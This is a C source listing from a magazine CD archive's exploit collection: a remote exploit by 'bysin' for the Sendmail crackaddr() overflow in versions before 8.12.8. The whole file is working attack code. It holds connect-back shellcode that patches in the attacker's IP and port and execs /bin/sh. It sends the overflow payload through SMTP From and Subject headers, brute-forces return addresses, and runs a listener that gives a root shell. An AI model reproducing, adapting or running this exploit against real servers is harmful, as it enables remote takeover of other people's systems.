Chip 2007 January, February, March & April

home *** CD-ROM | disk | FTP | other *** search

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / mail / sendmail / bysin.c < prev next >

Wrap

C/C++ Source or Header | 2005-02-12 | 12KB | 393 lines

/* Sendmail <8.12.8 crackaddr() exploit by bysin */ /* from the l33tsecurity crew */ #include <sys/types.h> #include <sys/socket.h> #include <sys/time.h> #include <netinet/in.h> #include <unistd.h> #include <netdb.h> #include <stdio.h> #include <fcntl.h> #include <errno.h> int maxarch=1; struct arch { char *os; int angle,nops; unsigned long aptr; } archs[] = { {"Slackware 8.0 with sendmail 8.11.4",138,1,0xbfffbe34} }; ///////////////////////////////////////////////////////// #define LISTENPORT 2525 #define BUFSIZE 4096 char code[]= /* 116 bytes */ "\xeb\x02" /* jmp <shellcode+4> */ "\xeb\x08" /* jmp <shellcode+12> */ "\xe8\xf9\xff\xff\xff" /* call <shellcode+2> */ "\xcd\x7f" /* int $0x7f */ "\xc3" /* ret */ "\x5f" /* pop %edi */ "\xff\x47\x01" /* incl 0x1(%edi) */ "\x31\xc0" /* xor %eax,%eax */ "\x50" /* push %eax */ "\x6a\x01" /* push $0x1 */ "\x6a\x02" /* push $0x2 */ "\x54" /* push %esp */ "\x59" /* pop %ecx */ "\xb0\x66" /* mov $0x66,%al */ "\x31\xdb" /* xor %ebx,%ebx */ "\x43" /* inc %ebx */ "\xff\xd7" /* call *%edi */ "\xba\xff\xff\xff\xff" /* mov $0xffffffff,%edx */ "\xb9\xff\xff\xff\xff" /* mov $0xffffffff,%ecx */ "\x31\xca" /* xor %ecx,%edx */ "\x52" /* push %edx */ "\xba\xfd\xff\xff\xff" /* mov $0xfffffffd,%edx */ "\xb9\xff\xff\xff\xff" /* mov $0xffffffff,%ecx */ "\x31\xca" /* xor %ecx,%edx */ "\x52" /* push %edx */ "\x54" /* push %esp */ "\x5e" /* pop %esi */ "\x6a\x10" /* push $0x10 */ "\x56" /* push %esi */ "\x50" /* push %eax */ "\x50" /* push %eax */ "\x5e" /* pop %esi */ "\x54" /* push %esp */ "\x59" /* pop %ecx */ "\xb0\x66" /* mov $0x66,%al */ "\x6a\x03" /* push $0x3 */ "\x5b" /* pop %ebx */ "\xff\xd7" /* call *%edi */ "\x56" /* push %esi */ "\x5b" /* pop %ebx */ "\x31\xc9" /* xor %ecx,%ecx */ "\xb1\x03" /* mov $0x3,%cl */ "\x31\xc0" /* xor %eax,%eax */ "\xb0\x3f" /* mov $0x3f,%al */ "\x49" /* dec %ecx */ "\xff\xd7" /* call *%edi */ "\x41" /* inc %ecx */ "\xe2\xf6" /* loop <shellcode+81> */ "\x31\xc0" /* xor %eax,%eax */ "\x50" /* push %eax */ "\x68\x2f\x2f\x73\x68" /* push $0x68732f2f */ "\x68\x2f\x62\x69\x6e" /* push $0x6e69622f */ "\x54" /* push %esp */ "\x5b" /* pop %ebx */ "\x50" /* push %eax */ "\x53" /* push %ebx */ "\x54" /* push %esp */ "\x59" /* pop %ecx */ "\x31\xd2" /* xor %edx,%edx */ "\xb0\x0b" /* mov $0xb,%al */ "\xff\xd7" /* call *%edi */ ; void header() { printf("\nSendmail <8.12.8 crackaddr() exploit by bysin\n"); printf(" from the l33tsecurity crew \n\n"); } void printtargets() { unsigned long i; header(); printf("\t Target\t Addr\t\t OS\n"); printf("\t-------------------------------------------\n"); for (i=0;i<maxarch;i++) printf("\t* %d\t\t 0x%08x\t %s\n",i,archs[i].aptr,archs[i].os); printf("\n"); } void writesocket(int sock, char *buf) { if (send(sock,buf,strlen(buf),0) <= 0) { printf("Error writing to socket\n"); exit(0); } } void readsocket(int sock, int response) { char temp[BUFSIZE]; memset(temp,0,sizeof(temp)); if (recv(sock,temp,sizeof(temp),0) <= 0) { printf("Error reading from socket\n"); exit(0); } if (response != atol(temp)) { printf("Bad response: %s\n",temp); exit(0); } } int readutil(int sock, int response) { char temp[BUFSIZE],*str; while(1) { fd_set readfs; struct timeval tm; FD_ZERO(&readfs); FD_SET(sock,&readfs); tm.tv_sec=1; tm.tv_usec=0; if(select(sock+1,&readfs,NULL,NULL,&tm) <= 0) return 0; memset(temp,0,sizeof(temp)); if (recv(sock,temp,sizeof(temp),0) <= 0) { printf("Error reading from socket\n"); exit(0); } str=(char*)strtok(temp,"\n"); while(str && *str) { if (atol(str) == response) return 1; str=(char*)strtok(NULL,"\n"); } } } #define NOTVALIDCHAR(c) (((c)==0x00)||((c)==0x0d)||((c)==0x0a)||((c)==0x22)||(((c)&0x7f)==0x24)||(((c)>=0x80)&&((c)<0xa0))) void findvalmask(char* val,char* mask,int len) { int i; unsigned char c,m; for(i=0;i<len;i++) { c=val[i]; m=0xff; while(NOTVALIDCHAR(c^m)||NOTVALIDCHAR(m)) m--; val[i]=c^m; mask[i]=m; } } void fixshellcode(char *host, unsigned short port) { unsigned long ip; char abuf[4],amask[4],pbuf[2],pmask[2]; if ((ip = inet_addr(host)) == -1) { struct hostent *hostm; if ((hostm=gethostbyname(host)) == NULL) { printf("Unable to resolve local address\n"); exit(0); } memcpy((char*)&ip, hostm->h_addr, hostm->h_length); } abuf[3]=(ip>>24)&0xff; abuf[2]=(ip>>16)&0xff; abuf[1]=(ip>>8)&0xff; abuf[0]=(ip)&0xff; pbuf[0]=(port>>8)&0xff; pbuf[1]=(port)&0xff; findvalmask(abuf,amask,4); findvalmask(pbuf,pmask,2); memcpy(&code[33],abuf,4); memcpy(&code[38],amask,4); memcpy(&code[48],pbuf,2); memcpy(&code[53],pmask,2); } void getrootprompt() { int sockfd,sin_size,tmpsock,i; struct sockaddr_in my_addr,their_addr; char szBuffer[1024]; if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) { printf("Error creating listening socket\n"); return; } my_addr.sin_family = AF_INET; my_addr.sin_port = htons(LISTENPORT); my_addr.sin_addr.s_addr = INADDR_ANY; memset(&(my_addr.sin_zero), 0, 8); if (bind(sockfd, (struct sockaddr *)&my_addr, sizeof(struct sockaddr)) == -1) { printf("Error binding listening socket\n"); return; } if (listen(sockfd, 1) == -1) { printf("Error listening on listening socket\n"); return; } sin_size = sizeof(struct sockaddr_in); if ((tmpsock = accept(sockfd, (struct sockaddr *)&their_addr, &sin_size)) == -1) { printf("Error accepting on listening socket\n"); return; } writesocket(tmpsock,"uname -a\n"); while(1) { fd_set readfs; FD_ZERO(&readfs); FD_SET(0,&readfs); FD_SET(tmpsock,&readfs); if(select(tmpsock+1,&readfs,NULL,NULL,NULL)) { int cnt; char buf[1024]; if (FD_ISSET(0,&readfs)) { if ((cnt=read(0,buf,1024)) < 1) { if(errno==EWOULDBLOCK || errno==EAGAIN) continue; else { printf("Connection closed\n"); return; } } write(tmpsock,buf,cnt); } if (FD_ISSET(tmpsock,&readfs)) { if ((cnt=read(tmpsock,buf,1024)) < 1) { if(errno==EWOULDBLOCK || errno==EAGAIN) continue; else { printf("Connection closed\n"); return; } } write(1,buf,cnt); } } } close(tmpsock); close(sockfd); return; } int main(int argc, char **argv) { struct sockaddr_in server; unsigned long ipaddr,i,bf=0; int sock,target; char tmp[BUFSIZE],buf[BUFSIZE],*p; if (argc <= 3) { printf("%s <target ip> <myip> <target number> [bruteforce start addr]\n",argv[0]); printtargets(); return 0; } target=atol(argv[3]); if (target < 0 || target >= maxarch) { printtargets(); return 0; } if (argc > 4) sscanf(argv[4],"%x",&bf); header(); fixshellcode(argv[2],LISTENPORT); if (bf && !fork()) { getrootprompt(); return 0; } bfstart: if (bf) { printf("Trying address 0x%x\n",bf); fflush(stdout); } if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) { printf("Unable to create socket\n"); exit(0); } server.sin_family = AF_INET; server.sin_port = htons(25); if (!bf) { printf("Resolving address... "); fflush(stdout); } if ((ipaddr = inet_addr(argv[1])) == -1) { struct hostent *hostm; if ((hostm=gethostbyname(argv[1])) == NULL) { printf("Unable to resolve address\n"); exit(0); } memcpy((char*)&server.sin_addr, hostm->h_addr, hostm->h_length); } else server.sin_addr.s_addr = ipaddr; memset(&(server.sin_zero), 0, 8); if (!bf) { printf("Address found\n"); printf("Connecting... "); fflush(stdout); } if (connect(sock,(struct sockaddr *)&server, sizeof(server)) != 0) { printf("Unable to connect\n"); exit(0); } if (!bf) { printf("Connected!\n"); printf("Sending exploit... "); fflush(stdout); } readsocket(sock,220); writesocket(sock,"HELO yahoo.com\r\n"); readsocket(sock,250); writesocket(sock,"MAIL FROM: spiderman@yahoo.com\r\n"); readsocket(sock,250); writesocket(sock,"RCPT TO: MAILER-DAEMON\r\n"); readsocket(sock,250); writesocket(sock,"DATA\r\n"); readsocket(sock,354); memset(buf,0,sizeof(buf)); p=buf; for (i=0;i<archs[target].angle;i++) { *p++='<'; *p++='>'; } *p++='('; for (i=0;i<archs[target].nops;i++) *p++=0xf8; *p++=')'; *p++=((char*)&archs[target].aptr)[0]; *p++=((char*)&archs[target].aptr)[1]; *p++=((char*)&archs[target].aptr)[2]; *p++=((char*)&archs[target].aptr)[3]; *p++=0; sprintf(tmp,"Full-name: %s\r\n",buf); writesocket(sock,tmp); sprintf(tmp,"From: %s\r\n",buf); writesocket(sock,tmp); p=buf; archs[target].aptr+=4; *p++=((char*)&archs[target].aptr)[0]; *p++=((char*)&archs[target].aptr)[1]; *p++=((char*)&archs[target].aptr)[2]; *p++=((char*)&archs[target].aptr)[3]; for (i=0;i<0x14;i++) *p++=0xf8; archs[target].aptr+=0x18; *p++=((char*)&archs[target].aptr)[0]; *p++=((char*)&archs[target].aptr)[1]; *p++=((char*)&archs[target].aptr)[2]; *p++=((char*)&archs[target].aptr)[3]; for (i=0;i<0x4c;i++) *p++=0x01; archs[target].aptr+=0x4c+4; *p++=((char*)&archs[target].aptr)[0]; *p++=((char*)&archs[target].aptr)[1]; *p++=((char*)&archs[target].aptr)[2]; *p++=((char*)&archs[target].aptr)[3]; for (i=0;i<0x8;i++) *p++=0xf8; archs[target].aptr+=0x08+4; *p++=((char*)&archs[target].aptr)[0]; *p++=((char*)&archs[target].aptr)[1]; *p++=((char*)&archs[target].aptr)[2]; *p++=((char*)&archs[target].aptr)[3]; for (i=0;i<0x20;i++) *p++=0xf8; for (i=0;i<strlen(code);i++) *p++=code[i]; *p++=0; sprintf(tmp,"Subject: AAAAAAAAAAA%s\r\n",buf); writesocket(sock,tmp); writesocket(sock,".\r\n"); if (!bf) { printf("Exploit sent!\n"); printf("Waiting for root prompt...\n"); if (readutil(sock,451)) printf("Failed!\n"); else getrootprompt(); } else { readutil(sock,451); close(sock); bf+=4; goto bfstart; } }